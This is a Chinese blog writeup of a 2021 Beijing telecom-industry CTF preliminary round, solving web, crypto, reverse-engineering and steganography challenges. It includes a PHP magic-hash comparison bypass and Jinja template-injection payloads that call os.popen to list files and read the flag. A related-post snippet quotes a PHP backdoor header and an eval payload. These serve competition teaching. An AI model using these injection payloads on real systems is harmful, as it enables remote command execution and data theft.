2021第三届北京通信行业CTF初赛writeup

于 2021-08-13 02:10:01 发布
阅读量1.1k 收藏 3
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_15174755/article/details/119658715
版权

整个CTF部分共计8道题,需要在3个小时内完成。

文章目录

Web

web1

题目

<?php
if(!$_GET['source']){  
  highlight_file(__FILE__);
}
$a = $_GET['a'];
$b = $_GET['b'];
$c = $_GET['c'];
$check = $a and $b;
if($check){
  if($a and $b){
    die("No flag!Try it again!");
  }
  else{
    if($c == md5($c)){
      die(getenv("FLAG"));
    }
  }
}
else{
  die("Are You kidding?");
}

php代码审计,主要考察==条件下,如何使用科学计数法绕过$c == md5($c)。典型的例子有很多,甚至可以用脚本暴力枚举。

0e291242476940776845150308577824 == 0e215962017

payload:

?source=a&a=1&c=0e215962017

web2

题目给了一个输入框,根据提示python的SSTI问题。利用python内置函数leak导入的包,发现有导入os模块。然后通过调用os的读写函数查看目录,读flag。

列目录

{{config.__class__.__init__.__globals__['os'].popen('dir').read()}}

读flag

{{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

web3

没做出来。nodejs题目,比赛结束后才知道题目直接有源码,当时这边一直刷不出来源码的压缩包。

Crypto

bbuh

给了一个文本文件,内容类似base编码,观察字符集或者暴力尝试。解密链base32 -> base64 -> url decode -> hex to ascii,果然如题目名称。解密脚本:

import base64
import binascii


a = 'JJKE252KKRRTISSUJUZEUVCNGJFFITJSJJKFS6SKKRGTESSUJV4EUVCNGJFFITJTJJKE2M2KKRMXSSSUJUZEUVCNGFFFITL2JJKE2M2KKRGXUSSUJV4EUVCNGJFFITL2JJKE26SKKRGXSSSUJV5EUVCNGNFFITJSJJKE26SKKRGXUSSUJV5EUVCNGJFFITJRJJKE2MSKKRGTCSSUJV5EUVCNPJFFITL2JJKE2MCKKRGTESSUJV5EUVCNPJFFITJTJJKE2MSKKRGTCSSUJV5EUVCNO5FFITL2JJKE2M2KKRGTESSUJV5EUVCNPJFFITLXJJKE26SKKRGTASSUJUZEUVCNGBFFITL2JJKE2NKKKRGXUSSUJUYUUVCNGJFFITL2JJKE2MSKKRGTASSUJV5EUVCNGVFFITL2JJKE2M2KKRGTESSUJUYEUVCNPJFFITJRJJKE26SKKRGTGSSUJV5EUVCNPBFFITJSJJKE2MCKKRGTGSSULEYA===='
b = base64.b32decode(a)
c = base64.b64decode(b.decode())
d = [chr(int(i, 16)) for i in c.split('%')[1:]]
e = ''.join(d)
f = e[2:]
print(binascii.a2b_hex(f))

rsa

rsa常见姿势,解密脚本:

import libnum
from Crypto.Util.number import long_to_bytes


e = 65537
c = 138722104762718976032857543651302886170525056001602716592141625658383767408264093262113709786172260615555996824567753811925695638669238386234708645111182134152464933217287541979019228159209984811628294038739751454086109950975209948197495743396777388273820349686335919516697411693046624095769703128469202211516688026123295211158531470647815841245920170011729185862667469966554776861242160654743541992847193786005787832285852281200524417632476356867636882769996990816521121318348035380840645933533359522382048945407964867136581334110211703327209265704187688598700074911726675767052882649582734149920164476354819772572
n = 15293032452367350153165488019040591774681947461806846211394110253205642263473409036704430501788674488200851282278984725917912759352314609076680106465146927987185897175378916654731151435950320195255522494291583988536029296991596619423707257925682257185042246028065776839633921182038513220548394723908052221984662464436997205150633282305927029392525099540708495780571249882489695973963632971183382777042356347551064066905696276285731788272303683511385482977782637450227421451201918293810767333044827440010656954584157537245294463744706911890881303916957823546888317663596809518986423759580164973515874335313890183844107
y = 247692304124525245667211985038807577149526498494620587227372131956797094691024123744042981854305983726197861602632106839535018310683933498643676609810589875918586417866386869064768090338701012890559718753173049383323496502184441436691424048763065870187602889642817121344647370355274568061468019226498216956532

phi = n - y + 1
d = libnum.invmod(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))

Reverse

re1

进入main,逻辑简单,异或算法,提取前面比较的字符串545E535549500702020B04030A1F515756011F065705061F500757071F030B050A0701020407570A054F

a = '545E535549500702020B04030A1F515756011F065705061F500757071F030B050A0701020407570A054F'
b = [chr(int(a[i:i+2], 16) ^ 0x32) for i in range(0, len(a), 2)]
print(''.join(b))

re2

有TLS反调试,ida可能会提示JUMPOUT,直接跳进去能分析(ghidra显示正常)。主要逻辑是异或计算,直接提取两个32长度的数据,计算出来结果比较诡异,偶数位上的数据不正常。回溯后发现在tls回调函数修改其中一组的数据,关注4015B0上下游函数逻辑,对应调整偶数位数据即可。

Misc

misc1

LSB隐写,不过色彩三通道排序不是RBG,而是BGR。运行隐写分析工具,java -jar .\stegsolve.jar 。在BGR排序的LSB下看到有PK头和flag.txt,疑似压缩包,使用save bin保存成flag.zip,解压即可。

B1u3Buf4
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
看雪ctf记录第一题
q07938206492的博客
06-26 485
点击测试程序随便输入提示error后使用ida 根据ida打开搜索error 跳转后f5转换成c代码 int sub_4011F4() { int v0; // ecx@8 double v1; // st7@8 double v2; // st6@8 double v3; // st6@8 const CHAR *v5; // [sp-Ch] [bp-28h]@9
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
CTF writeup
08-10
CTF writeup masterCTF write ups from the vulnhub CTF team
UMCTF2021-Writeup:MOCSCTF主持的UMCTF2021的文章
03-14
UMCTF2021-编写 MOCSCTF主持的UMCTF2021的文章 欢迎加入我们: 欢迎加入我们的行列: CTF时间: ://ctftime.org/team/120747 面子书: : 感谢以下提供协助: 感谢您提供的支持: 特鲁@MOCTF 梁锦@@ MOCTF 邦@MOCTF bluebear @ MOCTF RB916120 @ MOCTF molamola @ MOCTF Allon @ MOCTF T4rn @ MOCTF P0tato @ 20级茯苓@ 20级wyjbot @ 20级Mark0519 @ 20级aYoung @ 20级Ch4rc0al @ 20级詹姆斯@20级 类别 挑战 关联 加密货币 婴儿RSA 加密货币 caesars_army 加密货币 最佳素 加密货币 WII 加密货币 维吉内尔 加密货币 Feistel1 法证 笔记 法证 要求 法证 拨
DVCTF 2021 部分writeup
YuSec
03-16 847
Start 0x01 Crypto-Bootless RSA {"N": 148818474926605063920889194160313225216327492347368329952620222220173505969004341728021623813340175402441807560635794342531823708335067243413446678485411066531733814714571491348985375389581214154895499404668547123130986
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
目录 20200208-codegatectf2020quals 20191228-hxp36c3ctf 20191019-secconquals 20191012-hitconctfquals 20190928-pwnthybytesctf 20190928-bsidesdelhictf 20190921-dragonctfteaser 20190913-realworldctfqual ...
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
CTF-writeup
03-19
CTF-writeup
Ant x D^3 CTF Official Writeup.pdf
03-22
Ant x D^3 CTF Official Writeup.pdf
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
网络攻防竞赛预赛理论题
11-10
基础的网络知识,网络攻防竞赛理论题库,可以作为参加ctf初赛理论考试的参考文献
vue使用vue-router beforEach实现判断用户登录跳转路由筛选
weixin_34397291的博客
06-21 1565
尊重个人原创,转载请注明出处。 需求 在开发webApp的时候,考虑到用户体验,经常会把不需要调用个人数据的页面设置成游客可以访问,而当用户进入到一些需要个人数据的,例如购物车,个人中心,我的钱包等等,在进行登录的验证判断,如果判断已经登录,则显示页面,如果判断未登录,则直接跳转到登录页面提示用户登录,今天就来分享下如何使用vue-router的beforEach方法来实现这个需求。 实现 本篇文...
解决IAR中H文件不能打开的方法
K的专栏
05-22 3336
我用的是IAR EW8051-EV-750A。运行时经常出错,如:Fatal Error[Pe005]: could not open source file "hal.h" D:/CC2430 Tester-0.6/PER-Receive/Library/cc2430/HAL/source/wait.c 23。经过查资料才发现是路径没有配置好,下面我就说一下配置。下图是我已经配置好的(不同的
ctf mysql hash传递_分享个 CTF 小工具 bruteHASH
weixin_35953844的博客
02-23 329
别问,问就是为了 CTF思路源于一次三小时十二题的内部 CTF 竞赛,其中一道简单 MISC 给出明文范围(字母数字)和 MD5 开头,要求穷举出 flag——这当然不难,python 十几行代码搞定,但是运行出结果竟然用了近 20 分钟,感觉十分没有性价比啊!!于是想找一个高性能(C/C++)指定格式 HASH 穷举工具,呃 无果……为了 CTF 需要构造 HASH 时能够“一把梭”,于是有了年...
ctf题库--1000
热门推荐
miko2018的博客
08-21 2万+
&lt;题目&gt; 答案格式:CTF{} 解题链接: http://ctf5.shiyanbar.com/misc/1000.exe &lt;解答&gt; 打开题目链接下载文件,打开exe,在输入密码之前程序创建了tips.jpg的图片文件。 ※程序提示1000有特殊含义,因此我们考虑是二进制,我们将其转换成十进制的8并且输入。 得到了和tips一样的结果。可是点击确定后却没有...
2021数字中国创新大赛虎符网络安全赛-Writeup
末初的CSDN博客
04-04 4812
文章目录Web签到unsetme“慢慢做”管理系统Misc你会日志分析吗sectraffic Web 签到 http://cn-sec.com/archives/313267.html User-Agentt: zerodiumsystem("cat /flag"); unsetme 这题先放着 /?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27); “慢慢做”管理系统 根据题目提示,这里第一步登录应该利用一些字符串被md5
【Neepuctf】Crypto部分writeup
a5555678744的博客
05-24 845
Crypto方向 1.RSA 先看一下代码,分析一下逻辑,要想得到flag,不仅要知道n的分解方式,还需要知道e是多少,那么把目标分解为两步,而这两者都和encode(p,q,e)有关。 分析到encode(p,q,e)里面,发现这个函数里面,S是e的模逆,(m*e-1)%(p+1)==0 那么就知道一定要先搞定m和e就可以搞定p了 求e的过程 这是明显的padding Oracle攻击可以用富兰克林算法搞定 注意以下脚本并非python脚本而是sagemath脚本,需要在sag.
2021虎符CTF第一道misc-writeup
慢就是快
04-06 698
文章目录1.题目概况2.思路3.提取数据得出结果 1.题目概况 经过简单分析,发现攻击者使用了延时注入的攻击手法,那么我们需要判断哪些语句成功执行了 2.思路 延时语句sleep(2),说明延时2秒,那么延时成功一个是发包间隔会相差两秒,而一个是成功和失败的返回界面不一致,那么响应包长度也不一致。如下图 3.提取数据得出结果 满足条件的语句提取后,把十进制转换成字符就好了,转换出来后是 ZmxhZ3tZb3VfYXJlX3NvX2dyZWF0fQ== 尝试base64解码, flag{You_are
北京联合大学 ctf
最新发布
08-18
北京联合大学ctf是指北京联合大学举办的网络安全技术竞赛。CTF全称为Capture The Flag,是一种网络安全技术竞赛形式,旨在提升参赛选手在网络安全领域的技能和实战能力。 北京联合大学ctf作为该校的一项重要活动,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值